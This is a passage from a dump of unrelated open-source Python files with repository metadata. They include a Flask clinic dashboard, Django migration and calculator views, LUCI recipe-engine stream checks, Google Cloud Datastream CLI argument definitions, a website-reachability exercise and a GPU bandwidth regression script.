Patient.p_tc.ilike(\"%\" + request.form['text'] + \"%\") |\n Patient.p_name.ilike(\"%\" + request.form['text'] + \"%\")\n\n ).all()\n results = [p.to_dict() for p in patients]\n print(patients)\n return jsonify({'query': results})\n\n\n@dashboard.route('/delete_appointment', methods=['GET'])\n@login_required\ndef delete_appointment():\n patient_tc = request.args['button-delete']\n temp_appo = Appointment.query.filter_by(patient_tc=patient_tc)\n Appointment.query.filter_by(patient_tc=patient_tc).delete()\n db.session.commit()\n return jsonify({'msg': \"{} silindi.\".format(temp_appo.patient_tc)})\n\n\n@dashboard.route('/profile', methods=['GET', 'POST'])\n@login_required\ndef profile2():\n doctor = DoctorForm()\n user = current_user.query.filter_by().first()\n return render_template('profile.html', user=user, doctor=doctor)\n\n\ndef get_db_connection():\n conn = psycopg2.connect(host=POSTGRES_URL,\n database=POSTGRES_DB,\n user=POSTGRES_USER,\n password=POSTGRES_PASS)\n return conn\n\n\ndef layout():\n conn = get_db_connection()\n usr_id_s = conn.cursor()\n usr_id_s.execute('SELECT user_id FROM appuser where user_type=\\'Patient\\';')\n not_patient = True\n pat_id_s = usr_id_s.fetchall()\n usr = current_user.current_user.query.filter_by().first().user_id\n for id in pat_id_s:\n if id == current_user.current_user.query.filter_by().first().user_id:\n not_patient = False\n usr_id_s.close()\n conn.close()\n return render_template('layout.html', not_patient=not_patient, usr=usr)\n","repo_name":"EmreBlbn/bil372Project","sub_path":"dashboard/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20581148880","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('perf', '0021_staff_job_name'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DataImport',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('year', models.IntegerField(verbose_name='\\u5e74')),\n ('month', models.IntegerField(verbose_name='\\u6708')),\n ('file', models.FileField(upload_to=b'', verbose_name='Excel \\u6587\\u4ef6')),\n ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u4e0a\\u4f20\\u65e5\\u671f')),\n ],\n options={\n 'db_table': 'perf_data_import',\n 'verbose_name': '\\u6570\\u636e\\u5bfc\\u5165',\n 'verbose_name_plural': '\\u6570\\u636e\\u5bfc\\u5165',\n },\n ),\n migrations.AlterField(\n model_name='jobmatch',\n name='job',\n field=models.ForeignKey(verbose_name='\\u5bf9\\u5e94\\u5c97\\u4f4d', to='perf.Job'),\n ),\n migrations.AlterField(\n model_name='staff',\n name='job_name',\n field=models.CharField(max_length=100, verbose_name='\\u5c97\\u4f4d\\u540d\\u79f0', blank=True),\n ),\n ]\n","repo_name":"doraemonext/wbkang_xinan","sub_path":"perf/migrations/0022_auto_20160809_0116.py","file_name":"0022_auto_20160809_0116.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28599530380","text":"from builtins import str\nfrom future.utils import iteritems\n\nfrom PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2\nfrom PB.recipe_engine import result as result_pb2\n\nfrom ...engine_types import StepPresentation\n\nfrom . import StreamEngine\nfrom .product import ProductStreamEngine\n\n\nclass StreamEngineInvariants(StreamEngine):\n \"\"\"Checks that the users are using a StreamEngine hygenically.\n\n Multiply with actually functional StreamEngines so you don't have to check\n these all over the place.\n \"\"\"\n def __init__(self):\n self._streams = set()\n\n @classmethod\n def wrap(cls, other):\n \"\"\"Returns (ProductStreamEngine): A product applying invariants to \"other\".\n \"\"\"\n return ProductStreamEngine(cls(), other)\n\n @property\n def supports_concurrency(self):\n return True\n\n def write_result(self, result):\n assert isinstance(result, result_pb2.RawResult), (\n 'expected type result_pb2.RawResult; got %s' % (type(result), ))\n assert result.status & common_pb2.ENDED_MASK, (\n 'expected terminal build status; got %s' % result.status)\n\n class StepStream(StreamEngine.StepStream):\n def __init__(self, engine, step_name):\n super(StreamEngineInvariants.StepStream, self).__init__()\n self._engine = engine\n self._step_name = step_name\n self._open = True\n self._logs = {}\n self._status = 'SUCCESS'\n\n def write_line(self, line):\n assert '\\n' not in line\n assert self._open\n\n def close(self):\n assert self._open\n for log_name, log in iteritems(self._logs):\n if isinstance(log, self._engine.LogStream):\n assert not log._open, 'Log %s still open when closing step %s' % (\n log_name, self._step_name)\n self._open = False\n\n def new_log_stream(self, log_name):\n assert self._open\n assert log_name not in self._logs, 'Log %s already exists in step %s' % (\n log_name, self._step_name)\n ret = self._engine.LogStream(self, log_name)\n self._logs[log_name] = ret\n return ret\n\n def append_log(self, log):\n assert self._open\n assert isinstance(log, common_pb2.Log), (\n 'expected type common_pb2.Log; got type %s' % (type(log),))\n assert log.name not in self._logs, 'Log %s already exists in step %s' % (\n log.name, self._step_name)\n self._logs[log.name] = None # The instance is not needed\n\n def add_step_text(self, text):\n pass\n\n def add_step_summary_text(self, text):\n pass\n\n def set_summary_markdown(self, text):\n pass\n\n def add_step_link(self, name, url):\n assert isinstance(name, str), 'Link name %s is not a string' % name\n assert isinstance(url, str), 'Link url %s is not a string' % url\n\n def set_step_status(self, status, had_timeout):\n _ = had_timeout\n assert status in StepPresentation.STATUSES, 'Unknown status %r' % status\n if status == 'SUCCESS':\n # A constraint imposed by the annotations implementation\n assert self._status == 'SUCCESS', (\n 'Cannot set successful status after status is %s' % self._status)\n self._status = status\n\n def set_build_property(self, key, value):\n pass\n\n def set_step_tag(self, key, value):\n assert isinstance(key, str), 'Step Tag key %s is not a string' % key\n assert isinstance(value, str), 'Step Tag value %s is not a string' % value\n assert key != '', 'Step Tag key %s is empty' % key\n assert value != '', 'Step Tag value %s is empty' % value\n\n class LogStream(StreamEngine.Stream):\n def __init__(self, step_stream, log_name):\n self._step_stream = step_stream\n self._log_name = log_name\n self._open = True\n\n def write_line(self, line):\n assert '\\n' not in line, 'Newline in %r' % (line,)\n assert self._step_stream._open\n assert self._open\n\n def close(self):\n assert self._step_stream._open\n assert self._open\n self._open = False\n\n def new_step_stream(self, name_tokens, allow_subannotations,\n merge_step=False):\n del allow_subannotations, merge_step\n\n if any('|' in token for token in name_tokens):\n raise ValueError(\n 'The pipe (\"|\") character is reserved in step names: %r'\n % (name_tokens,))\n\n name = '|'.join(name_tokens)\n assert name not in self._streams, 'Step %r already exists' % (name,)\n self._streams.add(name)\n return self.StepStream(self, name)\n","repo_name":"luci/recipes-py","sub_path":"recipe_engine/internal/stream/invariants.py","file_name":"invariants.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"38653079829","text":"'''Exercício Python 114: Crie um código em Python que teste se o site pudim está acessível pelo computador usado.'''\n\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nurl = Request('http://pudim.com.br/')\n\ntry:\n response = urlopen(url)\nexcept (HTTPError, URLError):\n print('\\033[0;31mO site não está disponível.\\033[m')\nelse:\n print('\\033[0;31mConsegui acessar o site Pudim com sucesso!\\033[m')","repo_name":"gdagomes/Python","sub_path":"Curso_em_video/Mundo 3 - Estruturas de dados, funções, módulos e tratamento de erros/ex114.py","file_name":"ex114.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27767386949","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope.concepts import concepts\nfrom googlecloudsdk.command_lib.util.concepts import concept_parsers\nfrom googlecloudsdk.command_lib.util.concepts import presentation_specs\n\n_MYSQL_SOURCE_CONFIG_HELP_TEXT_BETA = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for MySQL Source Config.\n\n The JSON file is formatted as follows, with snake_case field naming:\n\n ```\n {\n \"allowlist\": {},\n \"rejectlist\": {\n \"mysql_databases\": [\n {\n \"database_name\":\"sample_database\",\n \"mysql_tables\": [\n {\n \"table_name\": \"sample_table\",\n \"mysql_columns\": [\n {\n \"column_name\": \"sample_column\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_MYSQL_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for MySQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"mysqlDatabases\": [\n {\n \"database\":\"sample_database\",\n \"mysqlTables\": [\n {\n \"table\": \"sample_table\",\n \"mysqlColumns\": [\n {\n \"column\": \"sample_column\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_ORACLE_SOURCE_CONFIG_HELP_TEXT_BETA = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Oracle Source Config.\n\n The JSON file is formatted as follows, with snake_case field naming:\n\n ```\n {\n \"allowlist\": {},\n \"rejectlist\": {\n \"oracle_schemas\": [\n {\n \"schema_name\": \"SAMPLE\",\n \"oracle_tables\": [\n {\n \"table_name\": \"SAMPLE_TABLE\",\n \"oracle_columns\": [\n {\n \"column_name\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_ORACLE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Oracle Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"oracleSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"oracleTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"oracleColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n }\n }\n ```\n\"\"\"\n_POSTGRESQL_CREATE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for PostgreSQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"postgresqlSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"postgresqlTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"postgresqlColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n },\n \"replicationSlot\": \"SAMPLE_REPLICATION_SLOT\",\n \"publication\": \"SAMPLE_PUBLICATION\"\n }\n ```\n\"\"\"\n\n_POSTGRESQL_UPDATE_SOURCE_CONFIG_HELP_TEXT = \"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for PostgreSQL Source Config.\n\n The JSON file is formatted as follows, with camelCase field naming:\n\n ```\n {\n \"includeObjects\": {},\n \"excludeObjects\": {\n \"postgresqlSchemas\": [\n {\n \"schema\": \"SAMPLE\",\n \"postgresqlTables\": [\n {\n \"table\": \"SAMPLE_TABLE\",\n \"postgresqlColumns\": [\n {\n \"column\": \"COL\",\n }\n ]\n }\n ]\n }\n ]\n },\n \"replicationSlot\": \"SAMPLE_REPLICATION_SLOT\",\n \"publication\": \"SAMPLE_PUBLICATION\"\n }\n ```\n\"\"\"\n\n\ndef ConnectionProfileAttributeConfig(name='connection_profile'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The connection profile of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef PrivateConnectionAttributeConfig(name='private_connection'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The private connection of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef StreamAttributeConfig(name='stream'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The stream of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef RouteAttributeConfig(name='route'):\n return concepts.ResourceParameterAttributeConfig(\n name=name,\n help_text='The route of the {resource}.',\n completion_request_params={'fieldMask': 'name'},\n completion_id_field='id')\n\n\ndef LocationAttributeConfig():\n return concepts.ResourceParameterAttributeConfig(\n name='location', help_text='The Cloud location for the {resource}.')\n\n\ndef GetLocationResourceSpec(resource_name='location'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations',\n resource_name=resource_name,\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetConnectionProfileResourceSpec(resource_name='connection_profile'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.connectionProfiles',\n resource_name=resource_name,\n connectionProfilesId=ConnectionProfileAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetPrivateConnectionResourceSpec(resource_name='private_connection'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.privateConnections',\n resource_name=resource_name,\n privateConnectionsId=PrivateConnectionAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetStreamResourceSpec(resource_name='stream'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.streams',\n resource_name=resource_name,\n streamsId=StreamAttributeConfig(name=resource_name),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef GetRouteResourceSpec(resource_name='route'):\n return concepts.ResourceSpec(\n 'datastream.projects.locations.privateConnections.routes',\n resource_name=resource_name,\n routesId=RouteAttributeConfig(name=resource_name),\n privateConnectionsId=PrivateConnectionAttributeConfig(\n 'private-connection'),\n locationsId=LocationAttributeConfig(),\n projectsId=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG,\n disable_auto_completers=True)\n\n\ndef AddConnectionProfileResourceArg(parser,\n verb,\n release_track,\n positional=True,\n required=True):\n \"\"\"Add a resource argument for a Datastream connection profile.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: Some arguments are added based on the command release\n track.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n required: bool, if True, means that a flag is required.\n \"\"\"\n if positional:\n name = 'connection_profile'\n else:\n name = '--connection-profile'\n\n connectivity_parser = parser.add_group(mutex=True)\n connectivity_parser.add_argument(\n '--static-ip-connectivity',\n action='store_true',\n help=\"\"\"use static ip connectivity\"\"\")\n\n if release_track == base.ReleaseTrack.BETA:\n connectivity_parser.add_argument(\n '--no-connectivity', action='store_true', help=\"\"\"no connectivity\"\"\")\n\n forward_ssh_parser = connectivity_parser.add_group()\n forward_ssh_parser.add_argument(\n '--forward-ssh-hostname',\n help=\"\"\"Hostname for the SSH tunnel.\"\"\",\n required=required)\n forward_ssh_parser.add_argument(\n '--forward-ssh-username',\n help=\"\"\"Username for the SSH tunnel.\"\"\",\n required=required)\n forward_ssh_parser.add_argument(\n '--forward-ssh-port',\n help=\"\"\"Port for the SSH tunnel, default value is 22.\\\n \"\"\",\n default=22)\n password_group = forward_ssh_parser.add_group(required=required, mutex=True)\n password_group.add_argument(\n '--forward-ssh-password', help=\"\"\"\\\n SSH password.\n \"\"\")\n password_group.add_argument(\n '--forward-ssh-private-key', help='SSH private key..')\n\n # TODO(b/207467120): deprecate BETA client.\n private_connection_flag_name = 'private-connection'\n if release_track == base.ReleaseTrack.BETA:\n private_connection_flag_name = 'private-connection-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetConnectionProfileResourceSpec(),\n 'The connection profile {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % private_connection_flag_name,\n GetPrivateConnectionResourceSpec(),\n 'Resource ID of the private connection.',\n flag_name_overrides={'location': ''},\n group=connectivity_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--%s.location' % private_connection_flag_name: ['--location'],\n }).AddToParser(parser)\n\n\ndef AddConnectionProfileDiscoverResourceArg(parser):\n \"\"\"Add a resource argument for a Datastream connection profile discover command.\n\n Args:\n parser: the parser for the command.\n \"\"\"\n connection_profile_parser = parser.add_group(mutex=True, required=True)\n connection_profile_parser.add_argument(\n '--connection-profile-object-file',\n help=\"\"\"Path to a YAML (or JSON) file containing the configuration\n for a connection profile object. If you pass - as the value of the\n flag the file content will be read from stdin.\"\"\"\n )\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n '--connection-profile-name',\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the connection profile.',\n flag_name_overrides={'location': ''},\n group=connection_profile_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--connection-profile-name.location': ['--location'],\n }).AddToParser(parser)\n\n\ndef GetVpcResourceSpec():\n \"\"\"Constructs and returns the Resource specification for VPC.\"\"\"\n\n def VpcAttributeConfig():\n return concepts.ResourceParameterAttributeConfig(\n name='vpc',\n help_text=\"\"\"fully qualified name of the VPC Datastream will peer to.\"\"\"\n )\n\n return concepts.ResourceSpec(\n 'compute.networks',\n resource_name='vpc',\n network=VpcAttributeConfig(),\n project=concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG)\n\n\ndef AddPrivateConnectionResourceArg(parser,\n verb,\n release_track,\n positional=True):\n \"\"\"Add a resource argument for a Datastream private connection.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: Some arguments are added based on the command release\n track.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n \"\"\"\n if positional:\n name = 'private_connection'\n else:\n name = '--private-connection'\n\n vpc_peering_config_parser = parser.add_group(required=True)\n\n vpc_peering_config_parser.add_argument(\n '--subnet',\n help=\"\"\"A free subnet for peering. (CIDR of /29).\"\"\",\n required=True)\n\n # TODO(b/207467120): use only vpc flag.\n vpc_field_name = 'vpc'\n if release_track == base.ReleaseTrack.BETA:\n vpc_field_name = 'vpc-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetPrivateConnectionResourceSpec(),\n 'The private connection {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % vpc_field_name,\n GetVpcResourceSpec(),\n 'Resource ID of the private connection.',\n group=vpc_peering_config_parser,\n required=True)\n ]\n concept_parsers.ConceptParser(\n resource_specs).AddToParser(parser)\n\n\ndef AddStreamResourceArg(parser, verb, release_track, required=True):\n \"\"\"Add resource arguments for creating/updating a stream.\n\n Args:\n parser: argparse.ArgumentParser, the parser for the command.\n verb: str, the verb to describe the resource, such as 'to update'.\n release_track: base.ReleaseTrack, some arguments are added based on the\n command release track.\n required: bool, if True, means that a flag is required.\n \"\"\"\n source_parser = parser.add_group(required=required)\n source_config_parser_group = source_parser.add_group(\n required=required, mutex=True)\n source_config_parser_group.add_argument(\n '--oracle-source-config',\n help=_ORACLE_SOURCE_CONFIG_HELP_TEXT_BETA if release_track\n == base.ReleaseTrack.BETA else _ORACLE_SOURCE_CONFIG_HELP_TEXT)\n source_config_parser_group.add_argument(\n '--mysql-source-config',\n help=_MYSQL_SOURCE_CONFIG_HELP_TEXT_BETA if release_track\n == base.ReleaseTrack.BETA else _MYSQL_SOURCE_CONFIG_HELP_TEXT)\n source_config_parser_group.add_argument(\n '--postgresql-source-config',\n help=_POSTGRESQL_UPDATE_SOURCE_CONFIG_HELP_TEXT if verb == 'update'\n else _POSTGRESQL_CREATE_SOURCE_CONFIG_HELP_TEXT\n )\n\n destination_parser = parser.add_group(required=required)\n destination_config_parser_group = destination_parser.add_group(\n required=required, mutex=True)\n destination_config_parser_group.add_argument(\n '--gcs-destination-config',\n help=\"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Google Cloud Storage Destination Config.\n\n The JSON file is formatted as follows:\n\n ```\n {\n \"path\": \"some/path\",\n \"fileRotationMb\":5,\n \"fileRotationInterval\":\"15s\",\n \"avroFileFormat\": {}\n }\n ```\n \"\"\",\n )\n destination_config_parser_group.add_argument(\n '--bigquery-destination-config',\n help=\"\"\"\\\n Path to a YAML (or JSON) file containing the configuration for Google BigQuery Destination Config.\n\n The JSON file is formatted as follows:\n\n ```\n {\n \"sourceHierarchyDatasets\": {\n \"datasetTemplate\": {\n \"location\": \"us-central1\",\n \"datasetIdPrefix\": \"my_prefix\",\n \"kmsKeyName\": \"projects/{project}/locations/{location}/keyRings/{key_ring}/cryptoKeys/{cryptoKey}\"\n }\n },\n \"dataFreshness\": \"3600s\"\n }\n ```\n \"\"\",\n )\n\n source_field = 'source'\n destination_field = 'destination'\n if release_track == base.ReleaseTrack.BETA:\n source_field = 'source-name'\n destination_field = 'destination-name'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n 'stream',\n GetStreamResourceSpec(),\n 'The stream to {}.'.format(verb),\n required=True),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % source_field,\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the source connection profile.',\n required=required,\n flag_name_overrides={'location': ''},\n group=source_parser),\n presentation_specs.ResourcePresentationSpec(\n '--%s' % destination_field,\n GetConnectionProfileResourceSpec(),\n 'Resource ID of the destination connection profile.',\n required=required,\n flag_name_overrides={'location': ''},\n group=destination_parser)\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--%s.location' % source_field: ['--location'],\n '--%s.location' % destination_field: ['--location']\n }).AddToParser(parser)\n\n\ndef AddStreamObjectResourceArg(parser):\n \"\"\"Add a resource argument for a Datastream stream object.\n\n Args:\n parser: the parser for the command.\n \"\"\"\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n '--stream',\n GetStreamResourceSpec(),\n 'The stream to list objects for.',\n required=True),\n ]\n concept_parsers.ConceptParser(\n resource_specs,\n command_level_fallthroughs={\n '--stream.location': ['--location'],\n }).AddToParser(parser)\n\n\ndef AddRouteResourceArg(parser, verb, positional=True):\n \"\"\"Add a resource argument for a Datastream route.\n\n Args:\n parser: the parser for the command.\n verb: str, the verb to describe the resource, such as 'to create'.\n positional: bool, if True, means that the resource is a positional rather\n than a flag.\n \"\"\"\n if positional:\n name = 'route'\n else:\n name = '--route'\n\n resource_specs = [\n presentation_specs.ResourcePresentationSpec(\n name,\n GetRouteResourceSpec(),\n 'The route {}.'.format(verb),\n required=True)\n ]\n concept_parsers.ConceptParser(\n resource_specs).AddToParser(parser)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/datastream/resource_args.py","file_name":"resource_args.py","file_ext":"py","file_size_in_byte":18432,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"29539219952","text":"from django.views.generic import TemplateView\nfrom django.shortcuts import render\nimport math\n# views for the home and calculate pages\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n\nclass CalcPageView(TemplateView):\n template_name = \"calculate.html\"\n# This function is called before getting the answer page\ndef answer(request):\n num1 = int(request.POST[\"num1\"])\n num2 = int(request.POST[\"num2\"])\n ans = 0\n# If statement to find what math operator to use\n if (request.POST[\"operation\"] == \"+\"):\n print(\"found +\")\n ans = num1 + num2\n elif (request.POST[\"operation\"] == \"-\"):\n print(\"found -\")\n ans = num1 - num2\n elif (request.POST[\"operation\"] == \"x\"):\n print(\"found x\")\n ans = num1 * num2\n elif (request.POST[\"operation\"] == \"/\"):\n print(\"found /\")\n ans = num1 / num2\n elif (request.POST[\"operation\"] == \"^\"):\n print(\"found ^\")\n ans = num1 ** num2\n else:\n print(\"found √\")\n ans = math.sqrt(num2)\n# sending in the data through the django template. The data has to go as a dictionary\n return render(request, \"answer.html\", {\"answer\": ans})\n\ndef extra(request):\n num1 = int(request.POST[\"num1\"])\n ans = 0\n# If statement to find what math operator to use\n if (request.POST[\"operation\"] == \"√\"):\n print(\"found √\")\n ans = math.sqrt(num1)\n elif(request.POST[\"operation\"] == \"cos\"):\n print(\"found cos\")\n ans = math.cos(num1)\n elif(request.POST[\"operation\"] == \"tan\"):\n print(\"found tan\")\n ans = math.tan(num1)\n else:\n print(\"found sin\")\n ans = math.sin(num1)\n# sending in the data through the django template. The data has to go as a dictionary\n return render(request, \"extra.html\", {\"answer\": ans})\n\n\n\n# python manage.py runserver\n\n# source .venv/bin/activate","repo_name":"BrighamV/web_App","sub_path":"django_project/calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73572803422","text":"from src.NetWorthCalculator import NetWorthCalculator\n\n\ndef test_net_worth_calculator() -> None:\n calculator = NetWorthCalculator(\n initial_investments=237000.0,\n initial_savings=20000.0,\n initial_income=314000.0,\n yearly_costs=53000.0,\n rate_of_return=0.07,\n rate_of_comp_growth=0.05,\n initial_age=25,\n )\n age, net_worth = calculator.calculate_net_worth()\n assert len(age) == len(net_worth)\n assert net_worth[0] == 257000.0\n assert net_worth[1] == 550290.0\n assert net_worth[2] == 880595.3\n\n","repo_name":"sethsaperstein/financialprojection","sub_path":"test/test_net_worth_calculator.py","file_name":"test_net_worth_calculator.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2912419101","text":"import subprocess\nimport sys\nimport numpy as np\nimport scipy.optimize as scipop\nimport scipy as sc\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom scipy.interpolate import interp1d\n\nmachine = 'dungani'\nresDir = 'Results_' + machine + '/'\n\nwith open(resDir + 'bandwidth_log_' + machine + '.md_sorted', \"r\") as file0:\n bw_db = file0.readlines()\n\n# For now use artificial bound to check\nbounds = [1e5,1e6,8e9]\n\ndef predict_error(X,Y):\n answer = []\n for val,prediction in zip(X,Y):\n if val == 0 and prediction ==0:\n answer.append(0)\n elif val == 0:\n answer.append(abs(val-prediction)/prediction)\n else:\n answer.append(abs(val-prediction)/val)\n return answer\n\ndef Bound_LinearRegression_1d(X_list,Y_list,lower_bound, upper_bound):\n bounded_Y = []\n bounded_X = []\n for qX, qY in zip(X_list, Y_list):\n if (qX < upper_bound and qX >= lower_bound):\n bounded_X.append(qX)\n bounded_Y.append(qY)\n x = np.array(bounded_X).reshape(-1, 1)\n y = np.array(bounded_Y)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n if model.intercept_ < 0:\n print('Negative intercept...ignoring:', model.intercept_)\n #model.intercept_ = 0\n if model.coef_ < 0:\n print('Negative coef...danger:', model.coef_)\n error = sum(predict_error(bounded_Y, model.predict(x)))/len(bounded_Y)\n print (error)\n return (model, error)\n\ndef LinearRegression_1d(X_list,Y_list):\n linear_subparts = []\n prev_bound = 0\n err = 0\n for upper_bound in bounds:\n pred,pred_err = Bound_LinearRegression_1d(X_list,Y_list,prev_bound, upper_bound)\n linear_subparts.append(pred) #.intercept_, model.coef_, lesser_bound, upper_bound)\n prev_bound = upper_bound\n err += pred_err\n err = err / len(bounds)\n print(err)\n return linear_subparts\n\ndef GigaVal_per_s(val, time):\n return val * 1e-9 / time\n\ndef GigaVal_per_s_l(l_val, l_time): \n answer = []\n for val, time in zip(l_val, l_time):\n if time!= 0:\n answer.append(val * 1e-9 / time)\n elif val!=0:\n sys.exit('Error: GigaVal_per_s_l called with elem val=%d time=%d' % (val,time))\n else:\n answer.append(0) \n return answer\n\ndef linearize_cpu_to_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = []\n bytes = []\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0:\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n return LinearRegression_1d(bytes,time)\n\ndef linearize_gpu_to_cpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = []\n bytes = []\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == 0 and int(temp[2]) == -1:\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n return LinearRegression_1d(bytes,time)\n\ndef t_transfer_to_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = [0]\n bytes = [0]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == -1 and int(temp[2]) == 0 and True: #temp[-1] != 'synth\\n':\n if bytes[-1] != int(temp[0]):\n time.append(float(temp[3]))\n bytes.append(int(temp[0]))\n else:\n print('Duplicate entry found for %d bytes' % bytes[-1])\n x = np.array(bytes).reshape(-1, 1)\n y = np.array(time)\n model = LinearRegression(n_jobs=-1).fit(x,y)\n r_sq = model.score(x, y)\n print('coefficient of determination:', r_sq)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n\n f = interp1d(bytes, time, kind='linear')\n f1 = interp1d(bytes, time, kind='zero')\n f2 = interp1d(bytes, time, kind='slinear')\n f3 = interp1d(bytes, time, kind='quadratic')\n f4 = interp1d(bytes, time, kind='cubic')\n return model.predict, f, f1, f2, f3, f4\n\ndef t_transfer_from_gpu():\n if len(bw_db) == 0:\n sys.exit('Error: Bandwidth benchmark not found')\n time = [0]\n bytes = [0]\n for line in bw_db:\n temp = line.split(',')\n if int(temp[1]) == 0 and int(temp[2]) == -1 and True: 